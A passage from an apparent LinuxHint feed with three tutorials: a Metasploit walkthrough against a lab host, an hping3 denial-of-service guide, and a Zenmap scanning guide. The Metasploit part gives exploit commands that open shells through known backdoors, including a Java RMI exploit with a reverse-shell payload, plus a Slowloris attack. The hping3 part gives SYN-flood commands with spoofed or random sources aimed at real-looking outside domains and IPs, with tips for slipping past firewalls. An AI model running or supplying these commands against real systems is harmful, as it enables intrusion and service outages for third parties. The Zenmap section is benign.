As you can see, Nmap already found security holes or vulnerabilities in the target's FTP service; it even links us to exploits to hack the target:


[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 21/tcp   open  ftp
[*] Nmap: | ftp-vsftpd-backdoor:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   vsFTPd version 2.3.4 backdoor
[*] Nmap: |     State: VULNERABLE (Exploitable)
[*] Nmap: |     IDs:  OSVDB:73573  CVE:CVE-2011-2523
[*] Nmap: |       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
[*] Nmap: |     Disclosure date: 2011-07-03
[*] Nmap: |     Exploit results:
[*] Nmap: |       Shell command: id
[*] Nmap: |       Results: uid=0(root) gid=0(root)
[*] Nmap: |     References:
[*] Nmap: |       http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
[*] Nmap: |       http://osvdb.org/73573
[*] Nmap: |       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/
unix/ftp/vsftpd_234_backdoor.rb
[*] Nmap: |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523

Below you can see that, in addition to the FTP security holes, Nmap detected SSL vulnerabilities:

[*] Nmap: |_sslv2-drown:
[*] Nmap: 22/tcp   open  ssh
[*] Nmap: 23/tcp   open  telnet
[*] Nmap: 25/tcp   open  smtp
[*] Nmap: | smtp-vuln-cve2010-4344:
[*] Nmap: |_  The SMTP server is not Exim: NOT VULNERABLE
[*] Nmap: | ssl-dh-params:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |       Transport Layer Security (TLS) services that use anonymous
[*] Nmap: |       Diffie-Hellman key exchange only provide protection against passive
[*] Nmap: |       eavesdropping, and are vulnerable to active man-in-the-middle attacks
[*] Nmap: |       which could completely compromise the confidentiality and integrity
[*] Nmap: |       of any data exchanged over the resulting session.
[*] Nmap: |     Check results:
[*] Nmap: |       ANONYMOUS DH GROUP 1
[*] Nmap: |             Cipher Suite: TLS_DH_anon_WITH_AES_256_CBC_SHA
[*] Nmap: |             Modulus Type: Safe prime
[*] Nmap: |             Modulus Source: postfix builtin
[*] Nmap: |             Modulus Length: 1024
[*] Nmap: |             Generator Length: 8
[*] Nmap: |             Public Key Length: 1024
[*] Nmap: |     References:
[*] Nmap: |       https://www.ietf.org/rfc/rfc2246.txt
[*] Nmap: |
[*] Nmap: |   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  OSVDB:122331  CVE:CVE-2015-4000
[*] Nmap: |       The Transport Layer Security (TLS) protocol contains a flaw that is
[*] Nmap: |       triggered when handling Diffie-Hellman key exchanges defined with
[*] Nmap: |       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
[*] Nmap: |       to downgrade the security of a TLS session to 512-bit export-grade
[*] Nmap: |       cryptography, which is significantly weaker, allowing the attacker
[*] Nmap: |       to more easily break the encryption and monitor or tamper with
[*] Nmap: |       the encrypted stream.
[*] Nmap: |     Disclosure date: 2015-5-19
[*] Nmap: |     Check results:
[*] Nmap: |       EXPORT-GRADE DH GROUP 1
[*] Nmap: |             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
[*] Nmap: |             Modulus Type: Safe prime
[*] Nmap: |             Modulus Source: Unknown/Custom-generated
[*] Nmap: |             Modulus Length: 512
[*] Nmap: |             Generator Length: 8
[*] Nmap: |             Public Key Length: 512
[*] Nmap: |     References:
[*] Nmap: |       https://weakdh.org
[*] Nmap: |       http://osvdb.org/122331
[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
[*] Nmap: |
[*] Nmap: |   Diffie-Hellman Key Exchange Insufficient Group Strength
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
[*] Nmap: |       of insufficient strength, especially those using one of a few commonly
[*] Nmap: |       shared groups, may be susceptible to passive eavesdropping attacks.
[*] Nmap: |     Check results:
[*] Nmap: |       WEAK DH GROUP 1
[*] Nmap: |             Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
[*] Nmap: |             Modulus Type: Safe prime
[*] Nmap: |             Modulus Source: postfix builtin
[*] Nmap: |             Modulus Length: 1024
[*] Nmap: |             Generator Length: 8
[*] Nmap: |             Public Key Length: 1024
[*] Nmap: |     References:
[*] Nmap: |_      https://weakdh.org
[*] Nmap: | ssl-poodle:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   SSL POODLE information leak
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  OSVDB:113251  CVE:CVE-2014-3566
[*] Nmap: |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
[*] Nmap: |           products, uses nondeterministic CBC padding, which makes it easier
[*] Nmap: |           for man-in-the-middle attackers to obtain cleartext data via a
[*] Nmap: |           padding-oracle attack, aka the "POODLE" issue.
[*] Nmap: |     Disclosure date: 2014-10-14
[*] Nmap: |     Check results:
[*] Nmap: |       TLS_RSA_WITH_AES_128_CBC_SHA
[*] Nmap: |     References:
[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
[*] Nmap: |       https://www.openssl.org/~bodo/ssl-poodle.pdf
[*] Nmap: |       https://www.imperialviolet.org/2014/10/14/poodle.html
[*] Nmap: |_      http://osvdb.org/113251
[*] Nmap: | sslv2-drown:
[*] Nmap: |   ciphers:
[*] Nmap: |     SSL2_RC4_128_EXPORT40_WITH_MD5
[*] Nmap: |     SSL2_DES_192_EDE3_CBC_WITH_MD5
[*] Nmap: |     SSL2_RC2_128_CBC_WITH_MD5
[*] Nmap: |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
[*] Nmap: |     SSL2_RC4_128_WITH_MD5
[*] Nmap: |     SSL2_DES_64_CBC_WITH_MD5
[*] Nmap: |   vulns:
[*] Nmap: |     CVE-2016-0703:
[*] Nmap: |       title: OpenSSL: Divide-and-conquer session key recovery in SSLv2
[*] Nmap: |       state: VULNERABLE
[*] Nmap: |       ids:
[*] Nmap: |         CVE:CVE-2016-0703
[*] Nmap: |       description:
[*] Nmap: |               The get_client_master_key function in s2_srvr.c in the SSLv2 implementation in
[*] Nmap: |       OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before
[*] Nmap: |       1.0.2a accepts a nonzero CLIENT-MASTER-KEY CLEAR-KEY-LENGTH value for an arbitrary
[*] Nmap: |       cipher, which allows man-in-the-middle attackers to determine the MASTER-KEY value
[*] Nmap: |       and decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a
[*] Nmap: |       related issue to CVE-2016-0800.
[*] Nmap: |
[*] Nmap: |       refs:
[*] Nmap: |         https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0703
[*] Nmap: |         https://www.openssl.org/news/secadv/20160301.txt

The following extract shows that a lot of vulnerabilities were found in the webserver, including access to sensitive login pages and Denial of Service vulnerabilities.


[*] Nmap: 53/tcp   open  domain
[*] Nmap: 80/tcp   open  http
[*] Nmap: | http-csrf:
[*] Nmap: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.184
[*] Nmap: |   Found the following possible CSRF vulnerabilities:
[*] Nmap: |
[*] Nmap: |     Path: http://192.168.0.184:80/dvwa/
[*] Nmap: |     Form id:
[*] Nmap: |     Form action: login.php
[*] Nmap: |
[*] Nmap: |     Path: http://192.168.0.184:80/dvwa/login.php
[*] Nmap: |     Form id:
[*] Nmap: |_    Form action: login.php
[*] Nmap: |_http-dombased-xss: Couldn't find any DOM based XSS.
[*] Nmap: | http-enum:
[*] Nmap: |   /tikiwiki/: Tikiwiki
[*] Nmap: |   /test/: Test page
[*] Nmap: |   /phpinfo.php: Possible information file
[*] Nmap: |   /phpMyAdmin/: phpMyAdmin
[*] Nmap: |   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
[*] Nmap: |   /icons/: Potentially interesting folder w/ directory listing
[*] Nmap: |_  /index/: Potentially interesting folder
[*] Nmap: | http-slowloris-check:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Slowloris DOS attack
[*] Nmap: |     State: LIKELY VULNERABLE
[*] Nmap: |     IDs:  CVE:CVE-2007-6750
[*] Nmap: |       Slowloris tries to keep many connections to the target web server open and hold
[*] Nmap: |       them open as long as possible.  It accomplishes this by opening connections to
[*] Nmap: |       the target web server and sending a partial request. By doing so, it starves
[*] Nmap: |       the http server's resources causing Denial Of Service.
[*] Nmap: |
[*] Nmap: |    Disclosure date: 2009-09-17
[*] Nmap: |    References:
[*] Nmap: |    http://ha.ckers.org/slowloris/
[*] Nmap: |_   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750

At this stage Nmap found a lot of SQL injection vulnerabilities; the quantity was so big that for this tutorial I removed many of them and left some:



[*] Nmap: | http-sql-injection:
[*] Nmap: |   Possible sqli for queries:
[*] Nmap: |     http://192.168.0.184:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=home.php&do=toggle-hints%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=home.php&
do=toggle-security%27%20OR%20sqlspider

Below Nmap discards XSS vulnerabilities again (like in the first extract), and reports Remote Method Invocation (RMI) security holes due to a wrong configuration allowing an attacker to execute malicious Java code:



[*] Nmap: |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
[*] Nmap: |_http-trace: TRACE is enabled
[*] Nmap: |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
[*] Nmap: 111/tcp  open  rpcbind
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 512/tcp  open  exec
[*] Nmap: 513/tcp  open  login
[*] Nmap: 514/tcp  open  shell
[*] Nmap: 1099/tcp open  rmiregistry
[*] Nmap: | rmi-vuln-classloader:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   RMI registry default configuration remote code execution vulnerability
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |       Default configuration of RMI registry allows loading classes from remote URLs which
 can lead to remote code execution.
[*] Nmap: |
[*] Nmap: |     References:
[*] Nmap: |_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/
misc/java_rmi_server.rb

Below you can see additional SSL vulnerabilities were found:


[*] Nmap: | ssl-ccs-injection:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   SSL/TLS MITM vulnerability (CCS Injection)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     Risk factor: High
[*] Nmap: |       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
[*] Nmap: |       does not properly restrict processing of ChangeCipherSpec messages,
[*] Nmap: |       which allows man-in-the-middle attackers to trigger use of a zero
[*] Nmap: |       length master key in certain OpenSSL-to-OpenSSL communications, and
[*] Nmap: |       consequently hijack sessions or obtain sensitive information, via
[*] Nmap: |       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
[*] Nmap: |
[*] Nmap: |     References:
[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
[*] Nmap: |       http://www.cvedetails.com/cve/2014-0224
[*] Nmap: |_      http://www.openssl.org/news/secadv_20140605.txt
[*] Nmap: | ssl-dh-params:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Diffie-Hellman Key Exchange Insufficient Group Strength
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
[*] Nmap: |       of insufficient strength, especially those using one of a few commonly
[*] Nmap: |       shared groups, may be susceptible to passive eavesdropping attacks.
[*] Nmap: |     Check results:
[*] Nmap: |       WEAK DH GROUP 1
[*] Nmap: |             Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
[*] Nmap: |             Modulus Type: Safe prime
[*] Nmap: |             Modulus Source: Unknown/Custom-generated
[*] Nmap: |             Modulus Length: 1024
[*] Nmap: |             Generator Length: 8
[*] Nmap: |             Public Key Length: 1024
[*] Nmap: |     References:
[*] Nmap: |_      https://weakdh.org
[*] Nmap: | ssl-poodle:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   SSL POODLE information leak
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  OSVDB:113251  CVE:CVE-2014-3566
[*] Nmap: |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other

The next extract shows our target is possibly infected with a trojan against an IRC service:


[*] Nmap: |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. 
See http://seclists.org/fulldisclosure/2010/Jun/277
[*] Nmap: 8009/tcp open  ajp13

The following extract shows the httponly flag isn’t properly configured, therefore the target is vulnerable to cross-site scripting attacks:


[*] Nmap: 8180/tcp open  unknown
[*] Nmap: | http-cookie-flags:
[*] Nmap: |   /admin/:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/index.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/login.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/admin.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/account.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/admin_login.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/home.html:

The following extract lists interesting accessible directories found on our target:


[*] Nmap: | http-enum:
[*] Nmap: |   /admin/: Possible admin folder
[*] Nmap: |   /admin/index.html: Possible admin folder
[*] Nmap: |   /admin/login.html: Possible admin folder
[*] Nmap: |   /admin/admin.html: Possible admin folder
[*] Nmap: |   /admin/account.html: Possible admin folder
[*] Nmap: |   /admin/admin_login.html: Possible admin folder
[*] Nmap: |   /admin/home.html: Possible admin folder
[*] Nmap: |   /admin/admin-login.html: Possible admin folder
[*] Nmap: |   /admin/adminLogin.html: Possible admin folder
[*] Nmap: |   /admin/controlpanel.html: Possible admin folder
[*] Nmap: |   /admin/cp.html: Possible admin folder
[*] Nmap: |   /admin/index.jsp: Possible admin folder

Finally, the scan ends and the post-scanning NSE is executed:


[*] Nmap: |
[*] Nmap: |     Disclosure date: 2009-09-17
[*] Nmap: |     References:
[*] Nmap: |       http://ha.ckers.org/slowloris/
[*] Nmap: |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
[*] Nmap: MAC Address: 08:00:27:DD:87:8C (Oracle VirtualBox virtual NIC)
[*] Nmap: Host script results:
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: |_smb-vuln-ms10-061: false
[*] Nmap: NSE: Script Post-scanning.
[*] Nmap: Initiating NSE at 17:02
[*] Nmap: Completed NSE at 17:02, 0.00s elapsed
[*] Nmap: Initiating NSE at 17:02
[*] Nmap: Completed NSE at 17:02, 0.00s elapsed
[*] Nmap: Read data files from: /opt/metasploit/common/share/nmap/
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 333.96 seconds
[*] Nmap: Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.120KB)
msf5 >

Now we have identified some security holes to attack our target.

Using Metasploit to hack an FTP server:

Once you have identified security holes on your target, use Metasploit commands to find proper exploits against them. As you saw previously, one of the first vulnerabilities found was in the vsFTPD server. To find matching exploits, within Metasploit run:

# search vsftpd

As you can see, Metasploit contains an exploit for a vsFTPD backdoor which may help us hack our target’s FTP server. To use this exploit, within Metasploit run:

# use exploit/unix/ftp/vsftpd_234_backdoor

To learn how to use any specific exploit run:

# show options

As you can see above, this exploit takes 2 options, RHOST (remote host) and RPORT. We only need to specify RHOST, since the port is already set (21).
To set the remote host (RHOST) by defining the target IP, run:

# set RHOST 192.168.0.184

Once the target is defined, run the following command to exploit the security hole:

# exploit

As you can see, I got a shell on the target; when running “ls” I can see the target’s files, so the attack succeeded. To leave the target just run:

# exit
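If you plan to repeat this attack, the same steps can be batched into a Metasploit resource script. The following is a minimal sketch (assuming the same target IP used above), saved for example as vsftpd.rc and launched with msfconsole -r vsftpd.rc:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.0.184
exploit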

Using Metasploit for DOS attack:

As you saw during the scan process, a Slowloris DOS vulnerability was found. To find out how to exploit it, follow the previous steps to search for a proper tool, in this case an auxiliary module instead of an exploit:

# search slowloris

Once we have found a tool to carry out the attack, run:

# use auxiliary/dos/http/slowloris

# set RHOST 192.168.0.184

Then just type:

# run

You’ll notice that while the attack runs the target’s HTTP service won’t be available; it keeps loading:
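As a quick sketch of how to confirm the effect from a second terminal (assuming the target serves HTTP on port 80), you can request the page with a timeout and watch it fail to answer:

# curl -m 10 http://192.168.0.184/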

 

Once we stop the attack by pressing CTRL+C the server will be available again:

Using Metasploit to hack an IRC server:

Internet Relay Chat is widely used worldwide; as you may have noticed during the first stages of the scan, an IRC (Unreal IRCD) service possibly infected with a trojan was found.

Let’s repeat the steps to find a tool to hack it:

# search unreal ircd

# use exploit/unix/irc/unreal_ircd_3281_backdoor
# show options
# set RHOST 192.168.0.184

Then run:

# exploit

And as you can see again, we have a shell session within the target.

Using Metasploit to execute malicious Java code:

This exploit targets the vulnerable RMI registry service found during the scan; the steps mirror the previous modules, except that this time we also choose a payload and set LHOST (our own IP address) for the reverse connection:

# use exploit/multi/misc/java_rmi_server
# show options

# set RHOST 192.168.0.184
# show payloads
# set payload java/meterpreter/reverse_tcp

# set LHOST 192.168.0.50

# exploit
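If the exploit succeeds, a Meterpreter session should open. As a sketch, you can list the active sessions and interact with one of them using the standard Metasploit session commands:

# sessions -l
# sessions -i 1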

Using Metasploit to hack through Samba Usermap Script vulnerability:

Some steps, such as searching for the exploit, will be omitted to keep this tutorial short. To exploit this vulnerability run:

# use exploit/multi/samba/usermap_script
# show options

Set the target IP and exploit it by running:

# set RHOST 192.168.0.184
# exploit

As you can see, we gained a shell into our target.

Using Metasploit to exploit DistCC Daemon Command Execution:

This vulnerability is explained here.

To begin run:

# use exploit/unix/misc/distcc_exec

Then run:

# set RHOST 192.168.0.184
# exploit

As you can see, we gained access to the target again.

Using Metasploit for port scan (additional way without Nmap):

Carrying out a TCP scan with Metasploit:

To run a scan without using Nmap, Metasploit offers alternatives you can find by running:

# search portscan

To carry out a TCP scan run:

# use auxiliary/scanner/portscan/tcp
# set RHOST 192.168.0.184

To see additional options:

# show options

Choose the port range you want to scan by running:

# set PORTS 21-35

Then run the scan by executing:

# run

As you can see, ports 22, 25, 23 and 21 were found open.
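Optionally, scanner modules also accept a THREADS option to run several probes in parallel; a sketch to speed up the same scan:

# set THREADS 10
# run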

Carrying out a SYN scan with Metasploit:

For a SYN scan run:

# use auxiliary/scanner/portscan/syn
# set RHOST 192.168.0.184
# set PORTS 80
# run

As you can see port 80 was found open.

CONCLUSION

Metasploit is like a Swiss army knife; it has many functions. I hope you found this tutorial on Metasploit useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
hping3 flood ddos https://linuxhint.com/hping3/ Fri, 07 Feb 2020 20:15:37 +0000 https://linuxhint.com/?p=54857 This tutorial focuses on DDOS (Distributed Denial of Service) attacks using the hping3 tool. If you are already familiar with DOS (Denial of Service) and DDOS attacks you can continue reading from the hping3 practical instructions; otherwise it is recommended to learn how these attacks work first.

DOS Attacks


A Denial of Service (DOS) attack is a very simple technique to deny access to services (that’s why it is called a “denial of service” attack). This attack consists of overloading the target with oversized packets, or with a big quantity of them.

While this attack is very easy to execute, it does not compromise the information or privacy of the target; it is not a penetration attack and only aims to prevent access to the target.
By sending a quantity of packets the target can’t handle, attackers prevent the server from serving legitimate users.

DOS attacks are carried out from a single device, so it is easy to stop them by blocking the attacker’s IP. The attacker can change and even spoof (clone) the source IP address, but it is still not hard for firewalls to deal with such attacks, contrary to what happens with DDOS attacks.
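As a defensive sketch of that last point (assuming the offending address is 203.0.113.5, a documentation IP used here only as an example), a single attacking source can be dropped with iptables:

# iptables -A INPUT -s 203.0.113.5 -j DROP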

DDOS Attacks

A Distributed Denial of Service attack (DDOS) is similar to a DOS attack but carried out from different nodes (or different attackers) simultaneously. Commonly DDOS attacks are carried out by botnets. Botnets are networks of automated scripts or programs which infect computers to carry out an automated task (in this case a DDOS attack). A hacker can create a botnet and infect many computers, from which bots will launch DOS attacks; the fact that many bots are shooting simultaneously turns the DOS attack into a DDOS attack (that’s why it is called “distributed”).

Of course, there are exceptions in which DDOS attacks were carried out by real human attackers. For example, the hacker group Anonymous, integrated by thousands of people worldwide, used this technique very frequently due to its easy implementation (it only required volunteers who shared their cause); that is, for example, how Anonymous left Gaddafi’s Libyan government completely disconnected during the invasion, leaving the Libyan state defenseless before thousands of attackers from around the world.

This type of attack, when carried out from many different nodes, is extremely difficult to prevent and stop, and normally requires special hardware to deal with. This is because firewalls and defensive applications aren’t prepared to deal with thousands of attackers simultaneously. This is not the case with hping3: most attacks carried out through this tool will be blocked by defensive devices or software, yet the tool is useful on local networks or against poorly protected targets.

About hping3

The tool hping3 allows you to send crafted packets. It lets you control the size, quantity and fragmentation of packets in order to overload the target and bypass or attack firewalls. Hping3 can be useful for security or capacity testing purposes: with it you can test a firewall’s effectiveness and whether a server can handle a big amount of packets. Below you will find instructions on how to use hping3 for security testing purposes.

Getting started with DDOS attacks using hping3:

On Debian and Debian-based Linux distributions you can install hping3 by running:

# apt install hping3 -y

A simple DOS (not DDOS) attack would be:

# sudo hping3 -S --flood -V -p 80 170.155.9.185

Where:
sudo: gives the needed privileges to run hping3.
hping3: calls the hping3 program.
-S: specifies SYN packets.
--flood: shoot at discretion; replies will be ignored (that’s why replies won’t be shown) and packets will be sent as fast as possible.
-V: verbosity.
-p 80: port 80; you can replace this number with the port of the service you want to attack.
170.155.9.185: target IP.

Flood using SYN packets against port 80:

The following example portrays a SYN attack against lacampora.org:

# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source

Where:
lacampora.org: is the target.
-q: brief output.
-n: show the target IP instead of the hostname.
-d 120: set the packet size to 120 bytes.
--rand-source: randomize the source IP address (hides the real source).

The following shows another possible flood example:

SYN flood against port 80:

# sudo hping3 --rand-source ivan.com -S -q -p 80 --flood

With hping3 you can also attack your targets from a fake IP. In order to bypass a firewall you can even clone the target IP itself, or use any allowed address you may know (you can discover one, for example, with Nmap or a sniffer listening to established connections).

The syntax would be:

# sudo hping3 -a <FAKE IP> <target> -S -q -p 80 --faster -c2

In this practical example the attack would seem:

# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 --faster -c2
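To discover an address the target already trusts, as mentioned above, a sniffer is enough; a minimal sketch with tcpdump (assuming the interface is eth0 and the target is 190.0.175.100) simply watches traffic to and from the target:

# sudo tcpdump -n -i eth0 host 190.0.175.100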

I hope you found this tutorial on hping3 useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
How to use Zenmap to Scan a network https://linuxhint.com/zenmap_scan_network/ Fri, 07 Feb 2020 04:57:43 +0000 https://linuxhint.com/?p=54822 Zenmap is a GUI (Graphical User Interface) for the most popular network scanner, Nmap (Network Mapper). This article shows how to carry out different scan types, focusing on the flags executed behind the intuitive and user-friendly interface. While Zenmap usage is the same for all Linux systems, the installation procedure below is based on Debian and Debian-based Linux distributions. To begin, install Zenmap through the following command execution:

# apt install zenmap -y

Once installed you’ll find Zenmap in the applications menu. Depending on the scan type you want to carry out, it is recommended to run Zenmap as root; for example, Nmap SYN or raw scans require special privileges to be executed.

Alternatively, you can run Zenmap from the console, but since a graphical interface is mandatory to get it installed, this tutorial focuses on graphical management.

Once executed you’ll see Zenmap’s main window, including a drop-down menu to select the profile. For the first example select the Regular Scan.

In the “Target” box, fill the field with the IP address, domain name, IP range or subnet to scan. Once filled, press the “Scan” button next to the drop-down menu for selecting the desired profile.

Below you will see the following tabs: Nmap Output, Ports / Hosts, Topology, Host Details and Scans.
Where:

Nmap Output: this tab shows the regular Nmap output; it is the default screen when running scans.

Ports / Hosts: this tab prints services or ports with additional information, sorted by host; if a single host is selected it will list the status of the scanned ports.

Topology: this tab shows the path packets go through until reaching the target; in other words, it shows the hops between us and the target, similarly to a traceroute (see https://linuxhint.com/traceroute_nmap/), displaying the network structure based on the path.

Host Details: this tab prints the information on the scanned host as a tree. The information printed in this tab includes the host name and its OS, whether it is online or down, the status of the scanned ports, the uptime and more. It also displays a vulnerability estimation based on the services available on the target.

Scans: this tab shows a history of all executed scans, including running scans; you can also add scans by importing a file.

The following screenshot shows the Ports / Hosts tab:

As you can see, the screenshot above lists all ports, their protocol, their state and service; when available, and if instructed by the type of scan, it will also print the software version running behind each port.

The next tab shows the Topology or traceroute:

This tab displays the traceroute for the scan run against linuxhint.com; take into consideration that traceroute results may vary depending on hop availability.


The following screenshot displays the Host Details tab; there you can see the OS identified with an icon, the state (up), the number of open, filtered, closed and scanned ports, the uptime (not available here), the IP address and the hostname.

To continue with the tutorial, let’s check the Quick Scan mode by selecting it in the Profile drop-down menu:

Once selected, press “Scan”. In the Command field you’ll see the flags -T4 and -F.

The -T4 refers to the timing template. Timing templates are:

Paranoid: -T0, extremely slow, useful to bypass IDS (Intrusion Detection Systems)
Sneaky: -T1, very slow, also useful to bypass IDS (Intrusion Detection Systems)
Polite: -T2, neutral.
Normal: -T3, this is the default mode.
Aggressive: -T4, fast scan.
Insane: -T5, faster than Aggressive  scan technique.

(Source: https://linuxhint.com/nmap_xmas_scan/)

The -F flag instructs Zenmap (and Nmap) to carry out a fast scan.
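In other words, behind the GUI the Quick Scan profile simply runs the following Nmap command (shown here against linuxhint.com as an example target):

# nmap -T4 -F linuxhint.com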

As you can see above, the result is shorter than the Regular scan, fewer ports were scanned and the result was ready after 2.75 seconds.

For the following example, in the Profile field select the Intense scan; this time we will focus on the output.

When selecting this type of scan you’ll notice, in addition to the -T4 flag, the -A and -v flags.
The -A flag enables OS and version detection, script scanning and traceroute.
The -v flag increases the verbosity of the output.
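Put together, the Intense scan profile is equivalent to running the following from the terminal (example target only):

# nmap -T4 -A -v linuxhint.com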

Understanding the output:

The first lines show the characteristics of the scan process: the first line shows the Nmap version, followed by information on the pre-scan scripts to be executed; in this case 150 scripts from the Nmap Scripting Engine (NSE) were loaded:


Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-29 20:08 -03
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:08
Completed NSE at 20:08, 0.00s elapsed
Initiating NSE at 20:08
Completed NSE at 20:08, 0.00s elapsed

Following the pre-scan scripts, which are executed before carrying out the scan, the output will display information on the ping scan, the step prior to the DNS resolution used to gather the IP address (or the hostname if you provided an IP as the target). The aim of the ping scan step is to discover the availability of the host.

Once the DNS resolution ends, a SYN scan is executed in order to run a stealth scan (see https://linuxhint.com/nmap_stealth_scan/).


Initiating Ping Scan at 20:08
Scanning linuxhint.com (64.91.238.144) [4 ports]
Completed Ping Scan at 20:08, 0.43s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:08
Completed Parallel DNS resolution of 1 host. at 20:08, 0.00s elapsed
Initiating SYN Stealth Scan at 20:08
Scanning linuxhint.com (64.91.238.144) [1000 ports]
Discovered open port 80/tcp on 64.91.238.144
Discovered open port 25/tcp on 64.91.238.144
Discovered open port 443/tcp on 64.91.238.144
Discovered open port 22/tcp on 64.91.238.144
Increasing send delay for 64.91.238.144 from 0 to 5 due to 158 out of 394 dropped probes since last increase.
Increasing send delay for 64.91.238.144 from 5 to 10 due to 162 out of 404 dropped probes since last increase.
Warning: 64.91.238.144 giving up on port because retransmission cap hit (6).
